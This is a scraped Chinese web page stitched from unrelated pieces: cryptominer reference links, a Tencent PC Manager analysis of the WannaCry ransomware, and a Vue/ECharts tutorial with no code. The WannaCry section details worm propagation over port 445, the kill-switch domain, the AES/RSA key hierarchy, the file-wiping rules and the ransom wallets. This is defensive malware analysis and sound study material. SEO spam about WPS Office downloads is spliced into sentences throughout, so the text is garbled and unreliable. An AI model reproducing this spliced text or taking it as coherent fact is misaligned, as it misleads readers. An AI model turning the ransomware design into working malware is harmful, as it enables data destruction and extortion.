      3. https://blog.trendmicro.com/trendlabs-security-intelligence/rig-exploit-kit-now-using-cve-2018-8174-to-deliver-monero-miner/

      4. https://research.checkpoint.com/jenkins-miner-one-biggest-mining-operations-ever-discovered/

      5. https://www.volexity.com/blog/2018/08/27/active-exploitation-of-new-apache-struts-vulnerability-cve-2018-11776-deploys-cryptocurrency-miner/

      6. https://coinhive.com/

      7. https://github.com/xmrig/xmrig

      8. https://github.com/cnrig/cnrig

      9. https://github.com/fireice-uk/xmr-stak

  • wps的免费版下载的地址怎么找

      2017年5月12日,WannaCry蠕虫通过MS17-010漏洞在全球范围大爆发,感染了大量的计算机,该蠕虫感染计算机后会向计算机中植入敲诈者病毒,导致电脑大量文件被加密。腾讯电脑管家对其进行详细分析,分析纲要如下:

      一、病毒概况

      二、病毒详细分析

      1、mssecsvc.exe行为

      2、tasksche.exe行为(敲诈者)

      3、解密程序

      4、文件列表及作用

      三、Wanacry加解密过程深入分析

      1、文件加密

      2、文件删除及擦写逻辑

      3、文件擦写方案

      4、详细加密流程

      5、解密过程

      6、分析及调试验证

      四、变种及关联样本

      五、安全建议

      六、比特币支付以及解密流程

      七、比特币和洋葱网络

      一、病毒概况

      WannaCry病毒利用前阵子泄漏的方程式工具包中的“永恒之蓝”漏洞工具,进行网络端口扫描攻击,目标机器被成功攻陷后会从攻击机下载WannaCry病毒进行感染,并作为攻击机再次扫描互联网和局域网其他机器,形成蠕虫感染,大范围超快速扩散。

      病毒母体为mssecsvc.exe,运行后会扫描随机ip的互联网机器,尝试感染,也会扫描局域网相同网段的机器进行感染传播。此外,会释放敲诈者程序tasksche.exe,对磁盘文件进行加密勒索。

      病毒加密使用AES加密文件,并使用非对称加密算法RSA 2048加密随机密钥,每个文件使用一个随机密钥,理论上不可破解。

      

      二、病毒详细分析1、mssecsvc.exe行为

      1)开关

      病毒在网络上设置了一个开关,当本地计算机能够成功访问http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com时,退出进程,不再进行传播感染。目前该域名已被安全公司接管。

      

      2)蠕虫行为

      通过创建服务启动,每次开机都会自启动。

      

      从病毒自身读取MS17_010漏洞利用代码,playload分为x86和x64两个版本。

      

      创建两个线程,分别扫描内网和外网的IP,开始进程蠕虫传播感染。

      

      对公网随机ip地址445端口进行扫描感染。

      

      对于局域网,则直接扫描当前计算机所在的网段进行感染。

      

      感染过程,尝试连接445端口。

      

      如果连接成功,则对该地址尝试进行漏洞攻击感染。

      

      3)释放敲诈者

      

      2、tasksche.exe行为(敲诈者)

      解压释放大量敲诈者模块及配置文件,解压密码为WNcry@2ol7

      

      首先关闭指定进程,避免某些重要文件因被占用而无法感染。

      

      遍历磁盘文件,避开含有以下字符的目录。

      ProgramData

      Intel

      WINDOWS

      Program Files

      Program Files (x86)

      AppDataLocalTemp

      Local SettingsTemp

      This folder protects against ransomware. Modifying it will reduce protection

      

      同时,也避免感染病毒释放出来的说明文档。

      

      病毒加密流程图:

      

      遍历磁盘文件,加密以下178种扩展名文件:

      .doc, .docx, .xls, .xlsx, .ppt, .pptx, .pst, .ost, .msg, .eml, .vsd, .vsdx, .txt, .csv, .rtf, .123, .wks, .wk1, .pdf, .dwg, .onetoc2, .snt, .jpeg, .jpg, .docb, .docm, .dot, .dotm, .dotx, .xlsm, .xlsb, .xlw, .xlt, .xlm, .xlc, .xltx, .xltm, .pptm, .pot, .pps, .ppsm, .ppsx, .ppam, .potx, .potm, .edb, .hwp, .602, .sxi, .sti, .sldx, .sldm, .sldm, .vdi, .vmdk, .vmx, .gpg, .aes, .ARC, .PAQ, .bz2, .tbk, .bak, .tar, .tgz, .gz, .7z, .rar, .zip, .backup, .iso, .vcd, .bmp, .png, .gif, .raw, .cgm, .tif, .tiff, .nef, .psd, .ai, .svg, .djvu, .m4u, .m3u, .mid, .wma, .flv, .3g2, .mkv, .3gp, .mp4, .mov, .avi, .asf, .mpeg, .vob, .mpg, .wmv, .fla, .swf, .wav, .mp3, .sh, .class, .jar, .java, .rb, .asp, .php, .jsp, .brd, .sch, .dch, .dip, .pl, .vb, .vbs, .ps1, .bat, .cmd, .js, .asm, .h, .pas, .cpp, .c, .cs, .suo, .sln, .ldf, .mdf, .ibd, .myi, .myd, .frm, .odb, .dbf, .db, .mdb, .accdb, .sql, .sqlitedb, .sqlite3, .asc, .lay6, .lay, .mml, .sxm, .otg, .odg, .uop, .std, .sxd, .otp, .odp, .wb2, .slk, .dif, .stc, .sxc, .ots, .ods, .3dm, .max, .3ds, .uot, .stw, .sxw, .ott, .odt, .pem, .p12, .csr, .crt, .key, .pfx, .der

      程序中内置两个RSA 2048公钥,用于加密,其中一个含有配对的私钥,用于演示能够解密的文件,另一个则是真正的加密用的密钥,程序中没有相配对的私钥。

      

      病毒随机生成一个256字节的密钥,并拷贝一份用RSA2048加密,RSA公钥内置于程序中。

      

      构造文件头,文件头中包含有标志、密钥大小、RSA加密过的密钥、文件大小等信息。

      

      使用CBC模式AES加密文件内容,并将文件内容写入到构造好的文件头后,保存成扩展名为.WNCRY的文件,并用随机数填充原始文件后再删除,防止数据恢复。

      

      完成所有文件加密后释放说明文档,弹出勒索界面,需支付价值数百美元不等的比特币到指定的比特币钱包地址,三个比特币钱包地址硬编码于程序中。

      115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn

      12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw

      13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94

      

      3、解密程序

      病毒解密程序中内置了其中一个公钥的配对私钥,可以用于解密使用该公钥加密的几个文件,用于向用户“证明”程序能够解密文件,诱导用户支付比特币。

    wps的官网的下载的地址怎么找  

      

      此后,程序判断本地是否存在“00000000.dky”文件,该文件为真实解密所需私钥文件。若存在,则通过解密测试文件来检测密钥文件是否正确。

      

      若正确,则解密。若错误或不存在,病毒将程判断解压后的Tor目录下是否存在taskhsvc.exe。若不存在,则生成该文件,并且调用CreateProcessA拉起该进程:

      

      该程序主要为tor匿名代理工具,该工具启动后会监听本地9050端口,病毒通过本地代理通信实现与服务器连接。

      在点击“Check Payment”按钮后,由服务端判断是否下发解密所需私钥。若私钥下发,则会在本地生成解密所需要的dky文件。

      

      而后,程序便可利用该dky文件进行解密。不过,到目前为止,未曾有解密成功的案例。

      4、文件列表及作用

      b.wnry: 中招敲诈者后桌面壁纸

      c.wnry: 配置文件,包含洋葱域名、比特币地址、tor下载地址等

      r.wnry: 提示文件,包含中招提示信息

      s.wnry: zip文件,包含Tor客户端

      t.wnry: 解密后得到加密程序所需的dll文件

      u.wnry: 解密程序(敲诈者主界面)

      f.wnry: 可免支付解密的文件列表

      WNCYRT: 加密过程中生成的,有的被随机擦写过、有的是原文件、有的只对文件头进行了处理

      WNCRY: 加密后的文件

      三、Wanacry加解密过程深入分析

      勒索软件一个核心重点是其加解密过程,接下来我们对加解密和擦写逻辑进行详细分析。

      1、文件加密

      1)文件是使用AES进行加密的。

      2)加密文件所使用的AES密钥(AESKEY)是随机生成的,即每个文件所使用的密钥都是不同的。

      3)AESKEY通过RSA加密后,保存在加密后文件的文件头中。

      4)敲诈者会根据文件类型、大小、路径等来判断文件对用户的重要性,进而选择对重要文件的先行进行加密并擦写原文件,对认为不太重要的文件,仅作删除处理。

      2、文件删除及擦写逻辑

      1)对于桌面、文档、所有人桌面、所有人文档四个文件夹下小于200M的文件,均进行加密后擦写原文件。

      2)对于其他目录下小于200M的文件,不会进行擦写,而是直接删除,或者移动到back目录(C盘下的“%TEMP%”文件夹,以及其他盘符根目录下的“$RECYCLE”文件夹)中。

      3)移动到back后,的文件重命名为%d.WNCRYT,加密程序每30秒调用taskdl.exe对back目录下的这些文件定时删除。

      4)对于大于200M的文件,在原文件的基础上将文件头部64KB移动到尾部,并生成加密文件头,保存为“WNCRYT”文件。而后,创建“WNCRY”文件,将文件头写入,进而按照原文件大小,对该“WNCRY”文件进行填充。

      3、文件擦写方案

      1)先重写尾部1k。

      2)判断大小后重写尾部4k。

      3)从文件头开始每256k填充一次。

      4)填写的内容为随机数或0x55。

      4、详细加密流程

      总结密钥及加密关系大致如下:

      

      1)程序加密过程中,动态加载的dll里含有两个公钥(KEYBLOB格式),这里分别记为PK1和PK2。

      其中PK2用于加密部分文件的AESKEY,并将该部分加密文件的路径存放在f.wnry中,这些文件是可以直接解密的(DK2也存在与可执行文件中)。

      而PK1用于加密DK3(见后文介绍)。

      

      2)解密程序u.wnry(即界面程序@WanaDecryptor@.exe)中包含有一个私钥(KEYBLOB格式),该私钥与PK2配对,记为DK2。该DK2用于解密f.wnry中记录的文件。

      

      3)程序在每次运行时,会随机生成一组公私钥,用于。记为PK3、DK3。其中PK3保存在本地,主要用于加密各文件加密时随机生成的AESKEY。而DK3则由PK1加密后保存在本地,文件名为00000000.eky。

      5、解密过程

      1)f.wnry中记录的文件,主要使用DK2完成解密。

      2)其余文件若需要解密,则需点击check payment后,通过Tor将本地00000000.eky、00000000.res文件信息上传到服务端,由服务端使用作者自己保存的DK1解密后,下发得到DK3,本地保存为00000000.dky。

      3)得到DK3后,即可完成对磁盘中其余文件的解密。

      6、分析及调试验证将tasksche.exe拖到ida里可以发现,其加解密用到的是系统自带API,通过GetProcAddress来获取地址动态调用的。

      

      于是,就可以以此为突破口来进行分析。

      1)密钥分发过程

      a. 导入密钥DK2,存放于00154830

      

      b. 解密t.wnry

      

      解密得到的t.wnry实则为一个DLL文件,该文件负责文件加密操作。

      c. DLL线程导入PK1,存放于0016BE18

      

      d. 生成PK3、DK3

      

      e. 导出PK3

      

      导出后,会调用writefile在本地生成00000000.pky。

      

      f. 使用PK1加密DK3

      

      由上图可以匹配PK3和DK3。加密后,会调用writefile在本地生成00000000.eky。

      至此,验证了密钥生成关系。

      2)文件加密

      a. 导入PK3,放到0016D950

      

      b. 导入PK2,放到0016E510

      

      c. 生成AESKEY,并使用PK3加密

      生成随机AESKEY:

      

      使用PK3加密:

      

      d. 使用PK2加密

      

      使用PK2加密后的文件,会写入f.wnry中:

      

      选择使用PK2还是PK3,是随机的:

      

      3)文件删除和擦写条件

      调试时发现,敲诈者会对一些特定的文件再加密后对原文件进行擦写(填充随机数,为了防止数据回复)。操作首先找到擦写文件的逻辑,可以知道要擦写文件,有两个必要条件:

      条件1:传入的this+902即back目录必须不为空。

      条件2:传入给上层函数的参数a4,需要等于4。

      往上层函数追溯,发现,该参数来自于函数10002940。

      分别有3和4,两个参数:

      

      而再往上层,该参数取决于函数10002E70。

      通过分析,得知该函数逻辑如下,会对文件列表做四部处理:

      第一步:对文件类型为类型一(见后文)进行处理,做大小判断,大于200M返回3,小于1k返回1,其余大小则返回4。类型二的文件,均返回1。

      第二步:对剩余文件中,所有类型一的文件均返回1。而对其他类型文件,做大小判断,大于200M的文件返回3,大于1k小于200M的文件返回4,小于1k的文件返回1。

      第三步:对剩余文件,返回4。

      第四步:对wncryt文件,返回2,wncyr、exe、dll文件,返回1。
    wps office的免费版的下载地址的方法
      至于为什么要这么做,可能是考虑擦写效率问题,为了尽可能多的加密、擦写文件,耗时的文件、小于1k不重要的文件最后处理。其中,返回为1的,不做处理;返回为2的,做删除处理;返回为3的:生成加密文件头,而后做文件头转移处理,创建为“WNCRYT”文件,而后生成假的加密文件“WNCRY”,往里填充随机数;返回为4的,做完整文件加密处理。

      其中判断文件类型的代码在:

      WPS office的官网下载的地址是什么

      类型一:

      doc、docx、xls、xlsx、ppt、pptx、pst、msg、、vsd、vsdx、txt、csv、rtf、123、wks、wk1、pdf、dwg、onetoc2、snt、jpeg、jpg

      类型二:

      docb、docm、dot、dotm、dotx、xlsm、xlsb、xlw、xlt、xlm、xlc、xltx、xltm、pptm、pot、pps、ppsm、ppsx、ppam、potx、potm、edb、hwp、602、sxi、sti、sldx、sldm、sldm、vdi、vmdk、vmx、gpg、aes、arc、paq、bz2、tbk、bak、tar、tgz、gz、7z、rar、zip、backup、iso、vcd、bmp、png、gif、raw、cgm、tif、tiff、nef、psd、ai、svg、djvu、m4u、m3u、mid、wma、flv、3g2、mkv、3gp、mp4、mov、avi、asf、mpeg、vob、mpg、wmv、fla、swf、wav、mp3、sh、class、jar、java、rb、asp、php、jsp、brd、sch、dch、dip、pl、vb、vbs、ps1、bat、cmd、js、asm、h、pas、cpp、c、cs、suo、sln、ldf、mdf、ibd、myi、myd、frm、odb、dbf、db、mdb、accdb、sql、sqlitedb、sqlite3、asc、lay6、lay、mml、sxm、otg、odg、uop、std、sxd、otp、odp、wb2、slk、dif、stc、sxc、ots、ods、3dm、max、3ds、uot、stw、sxw、ott、odt、pem、p12、csr、crt、key、pfx、der

      如此,第二个条件已理清楚,剩下第一个,在分析时发现:程序运行后,首先对桌面、文档、所有人桌面、所有人文档四个文件夹进行处理。

      

      而对这几个文件夹处理的时候,back目录为空。对其他目录进行处理的时候,会进行判定:

      

      a. 处理C盘其他目录时,back目录为%temp%

      b. 处理其他盘符时,back目录为各盘符下的回收站目录,若回收站不存在,则创建

      由此,可以得到整体逻辑如下:

      a. 对于桌面、文档、所有人桌面、所有人文档四个文件夹下的文件,文件类型为类型一、类型二的文件,大小小于200M的,均进行加密后擦写原文件,大于200M的文件不做加密也不做擦写操作,仅作转移文件头处理,后生成随机数填充的WNCRY文件。

      b. 对于其他目录下文件:由于back目录不为空,不会对原文件进行擦写,而是直接删除,或者移动到back目录中。移动到back后,的文件命名为%d.WNCRYT,程序taskdl.ext会对back目录下的这些文件定时删除。同样,大于200M的文件不做加密也不做擦写操作,仅作转移文件头处理。

      4)文件擦写方式

      擦写方式主要是对加密后的原文件进行重写。根据代码可知,其主要填充数据有两种:随机数、0x55。

      

      而擦写过程为:

      a. 先重写尾部1k

      b. 判断大小后重写尾部4k

      c. 从文件头开始每256k填充一次

      5)解密通信

      敲诈者会在Tor目录下释放并拉起taskhsvc.exe,该工具启动后会监听本地9050端口,病毒通过本地代理连接实现与Tor服务器的通信。

      在点击“Check Payment”按钮后,上传本地res和eky文件。

      

      若私钥下发,则会在本地生成解密所需要的dky文件。

      

      有精力可以再分析一下和Tor通信的协议,说不定,能有些啥出来呢~wps的官网下载的方法在哪里

      

      6)RES文件解析

      解密同时需要res文件和eky,就来分析一下res文件格式。通过分析,可得其格式大致如下:

      

      红色框为八字节随机生成,应该是用于唯一性判定;蓝色框中为敲诈者首次运行时间,即首个文件加密时间;橘色框中为最后一个文件加密时间;紫色框中为加密文件总数;褐色框中记录的是加密文件总大小。

      有这些信息后,作者应该可以初步对非正常用户进行排除。当然,具体如何判定,还不得而知。

      四、变种及关联样本

      

      WannCry变种情况:腾讯电脑管家从MD5维度监控到数百个变种,其中很多是因为网络传输过程中尾部数据损坏导致,还有一部分变种多为在原始样本上做修改,如:Patch、加壳、伪造签名、再打包等方式,还没有监测到真正源码级变化的变种。

      相关样本:

      1、永恒之蓝漏洞传播的其他样本:Onion敲诈者、挖矿样本和UIWIX样本。

      2、Onion敲诈者针对服务器,对EXE,DLL,PHP等文件都进行加密,勒索金额较高,6个比特币。

      3、挖矿样本是一个“门罗币”的挖矿程序,中毒后会通过IP策略阻止其他攻击者对中毒机器的攻击。

      4、UIWIX技术难度更高,文件不落地在内存中执行,这两个相关样本都不具备蠕虫功能。

      中毒情况:虽然不断出现变种,整体接触样本和中毒用户数量呈现明显下降趋势,电脑管家能够及时查杀和防御。

      典型变种详细情况

      时间

      变种

      描述

      当前危害

      感染数量

      5月12日

      WannaCry原始样本

      域名开关地址:iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com。 比特币钱包地址: 115p7UMMngoj1pMvkpHijcRdfJNXj6LrLn 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94

      域名开关已经打开,对于能联网的机器不具备感染和传播能力。

      数万

      5月13日

      “想妹妹”变种

      主要通过加壳实现在傀儡进程notepad.exe中执行病毒代码,逃避杀软检测。

      传播能力弱

      较少

      域名开关修改变种

      开关域名改为:ifferfsodp9ifjaposdfjhgosurijfaewrwergwea.com

      域名开关已经打开,对于能联网的机器不具备感染和传播能力。

      较少

      5月14日

      Excel文件图标变种

      把图标改为excel文件图标,增加欺骗性。

      传播能力弱

      较少

      Patch域名开关变种

      Patch域名开关并产生传播的变种样本

      具有一定的传播能力

      较少

      5月15日

      “黑吃黑”变种

      出现“黑吃黑”版变种,修改3个比特币收款帐号,并修改开关域名,而且受害者支付的比特币被黑,无法获取解密私钥, 域名开关:ayylmaoTJHSSTasdfasdfasdfasdfasdfasdfasdf.com 比特币钱包地址: 15nzzRpAsbgd1mmoqQRtiXxN49f4LcmTh4 18ucAGbkgCkU61F6yPMD19dZRUBBHyDGRV 1M9sgF4zhpusQA82rtTbrcZGKD5oBrSW5t

      域名开关已经打开,对于能联网的机器不具备感染和传播能力。

      较少

      虚假签名变种

      出现通过添加虚假数字签名来尝试免杀的样本

      传播能力较弱

      较少

      域名开关patch变种

      再次出现多个修改开关域名的变种样本,使得样本可以在联网情况下进行感染传播

      具有一定的传播能力

      较少

      5月16日

      伪装知名安装包变种

      出现伪装成知名软件安装包的样本,增加欺骗性

      具有一定的传播能力

      较少

      其他关联样本

      时间

      名称

      描述

      当前危害

      感染数量

      最早4月份

      发现挖矿木马通过“永恒之蓝”漏洞传播

      该挖矿木马广度较大,黑客通过批量扫描445端口植入该木马,木马本身不具有自动传播功能,此外木马运行后会通过策略关闭445端口,阻止“永恒之蓝”类似攻击手法的木马进入系统

      没有自传播能力,用永恒之蓝漏洞传播

      数万

      最早4月份

      ONION敲诈者通过“永恒之蓝”漏洞传播

      敲诈者ONION经分析,也是通过“永恒之蓝”漏洞进行传播,黑客通过批量扫描445端口进行传播感染的,本身没有蠕虫传播能力,该木马最早于4月18号出现,是利用该漏洞传播最早的木马之一

      没有自传播能力,用永恒之蓝漏洞传播

      较少

      5月9号

      UIWIX敲诈者通过“永恒之蓝”漏洞传播

      敲诈者UIWIX经分析,也是通过“永恒之蓝”漏洞进行传播,该木马全程无文件落地,较难以防御和查杀,不过该木马也是黑客通过批量扫描445端口进行传播感染的,本身没有蠕虫传播能力

      没有自传播能力,用永恒之蓝漏洞传播

      较少

      五、安全建议

      腾讯电脑管家管家提供以下安全建议:

      1、关闭445、139等端口,方法详见:http://mp.weixin.qq.com/s/7kArJcKJGIZtBH1tKjQ-uA

      2、下载并更新补丁,及时修复漏洞(目前微软已经紧急发布XP、Win8、Windows server2003等系统补丁,已经支持所有主流系统,请立即更新);

      3、安装腾讯电脑管家,管家会自动开启主动防御进行拦截查杀;

      4、对于已经中毒的用户,可以使用电脑管家文件恢复工具进行恢复,也可以使用电脑管家提供的解密工具尝试解密,地址(http://t.cn/RaEHKZq)。

      5、建议用户使用微云,10G免费空间日常备份。
    wps office 官方下载地方是什么
      六、比特币支付以及解密流程

      1、 中毒后用户电脑里面文档会被加密为后缀为.wncry的文件。

      

      2、弹出提示框提示用户付款比特币地址。

      

      3、购买比特币往这个比特币钱包付款以后,通过病毒的洋葱网络的匿名通信通道把付款的钱包地址发给病毒作者。

      

      4、作者如果匿名网络在线,点击“check payment”会收到回复的确认消息,这个时候用于解密的密钥会通过匿名网络发送回来。

      

      5、然后选择解密就可以解密文件了。

      

      

      6、解密完成后是仍然有可能重新中毒的,病毒并没有标签解密过的机器。

      七、比特币和洋葱网络1、 比特币介绍

      1)比特币

      比特币(BitCoin)的概念最初由中本聪在2009年提出,根据中本聪的思路设计发布的开源软件以及建构其上的P2P网络。比特币是一种P2P形式的wps的官网最新的下载的地方在哪里。点对点的传输意味着一个去中心化的支付系统。

      与大多数货币不同,比特币不依靠特定货币机构发行,它依据特定算法,通过大量的计算产生,比特币经济使用整个P2P网络中众多节点构成的分布式数据库来确认并记录所有的交易行为,并使用密码学的设计来确保货币流通各个环节安全性。P2P的去中心化特性与算法本身可以确保无法通过大量制造比特币来人为操控币值。基于密码学的设计可以使比特币只能被真实的拥有者转移或支付。这同样确保了货币所有权与流通交易的匿名性。比特币与其他WPS office的电脑版的下载网站怎么找最大的不同,是其总数量非常有限,具有极强的稀缺性。该货币系统曾在4年内只有不超过1050万个,之后的总数量将被永久限制在2100万个。

      2)货币特点

      a. 完全去处中心化,没有发行机构,也就不可能操纵发行数量。其发行与流通,是通过开源的p2p算法实现。wps的免费版下载的地址的方法

      b. 匿名、免税、免监管。

      c. 健壮性。比特币完全依赖p2p网络,无发行中心,所以外部无法关闭它。

      d. 无国界、跨境。跨国汇款,会经过层层外汇管制机构,而且交易记录会被多方记录在案。但如果用比特币交易,直接输入数字地址,点一下鼠标,等待p2p网络确认交易后,大量资金就过去了。不经过任何管控机构,也不会留下任何跨境交易记录。

      (参考资料:http://baike.baidu-com/item/%E6%AF%94%E7%89%B9%E5%B8%81/4143690)

      2、洋葱网络介绍

      洋葱网络是一种在计算机网络上进行匿名通信的技术。通信数据先进行多层加密然后在由若干个被称为洋葱路由器组成的通信线路上被传送。每个洋葱路由器去掉一个加密层,以此得到下一条路由信息,然后将数据继续发往下一个洋葱路由器,不断重复,直到数据到达目的地。这就防止了那些知道数据发送端以及接收端的中间人窃得数据内容。

      * 本文作者:腾讯电脑管家(企业帐号),转载请注明来自FreeBuf.COM

  • wps的官网最新下载的地址

      背景

      ​ ECharts是由百度开发捐献给Apache的一款基于 JavaScript 的开源可视化图表库,有丰富的图表库、完善的文档,开箱即用,非常方便好用。
    wps的的官网最新的下载网站是什么(wps下载电脑版链接打不开)
      效果预览

      以下效果中的数据均为虚拟数据。

      其中包含饼状图、折线图。

       wps电脑版下载的地址是多少image-20210925180051481

      相关文档

      官方示例:https://echarts.apache.org/examples/zh/index.html

      官方文档:https://echarts.apache.org/handbook/zh/get-started/

      相关依赖

      工具类

      utils/index.js

      mixins/resize.js

      具体实现

      下面组件的变量每一个在官方文档中都有标注,自行去查阅。

      饼状环形圆角图(组件编写)

      Vue部分

      Js部分

      饼状平铺图(组件编写)

      Vue部分

      Js部分

      折线堆叠图(组件编写)WPS office的电脑版的下载地址怎么找

      Vue部分

      Js部分wps office 的官方下载网站怎么找

      组件引用(业务代码)

      具体的数据结构,在每一个组件里面的插槽位置都有对应的默认数据示例,自行将后端传来的数据转换为默认数据格式传递给组件就可以了wps的的官网最新下载地方在哪。

     WPS office官网下载的方法是什么 下载文章代码

      https://download.csdn.net/download/zhengjiacheng2016/85242441
    wps的的官网下载的地方是多少
      (如果帮助到你,感谢关注点赞)

      声明:不包含示例图的全部布局样式代码,需要的自己根据项目风格编写布局,放入Chart即可,像[WPS office的官网的下载的入口是什么 组件引用(业务代码) ],部分一样,简单的wps官网的下载的入口怎么找(wps官网下载 电脑版)用[el-card] 组件包装。